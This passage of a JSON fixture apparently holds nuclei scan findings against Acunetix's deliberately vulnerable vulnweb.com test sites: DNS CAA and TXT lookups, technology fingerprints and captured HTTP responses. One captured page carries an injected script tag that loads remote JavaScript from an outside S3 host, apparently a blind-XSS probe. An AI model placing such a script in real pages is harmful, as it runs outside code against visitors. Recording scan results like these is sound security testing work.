QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 124, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:45.268Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 36273\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 36273\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 125, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:45.362Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 58711\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 58711\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 126, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:45.478Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 36998\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 36998\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 127, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:45.577Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 27146\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 27146\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 128, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:45.669Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 54495\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 54495\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 129, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:45.763Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 28129\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 28129\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 130, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:45.854Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 55643\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 55643\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 131, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:45.950Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 46615\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 46615\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86400\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 132, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:46.040Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 10537\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 10537\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3599\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 133, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "dns/txt-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/txt-fingerprint", + "template_id": "txt-fingerprint", + "matcher_name": "", + "name": "DNS TXT Record Detected", + "severity": 0, + "description": "A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.", + "impact": null, + "remediation": null, + "extracted_results": "[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"]", + "references": "['https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:46.137Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 18990\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 18990\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testphp.vulnweb.com.\tIN\t TXT\n\n;; ANSWER SECTION:\ntestphp.vulnweb.com.\t3600\tIN\tTXT\t"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ"\n", + "is_llm_used": false, + "tags": [ + 1, + 4 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 134, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "google-font-api", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:46.234Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 OS/10.0.22631\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 135, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "ms-iis", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:34:46.316Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:32 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=yqqlv5rvfxxko131fkruqp55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 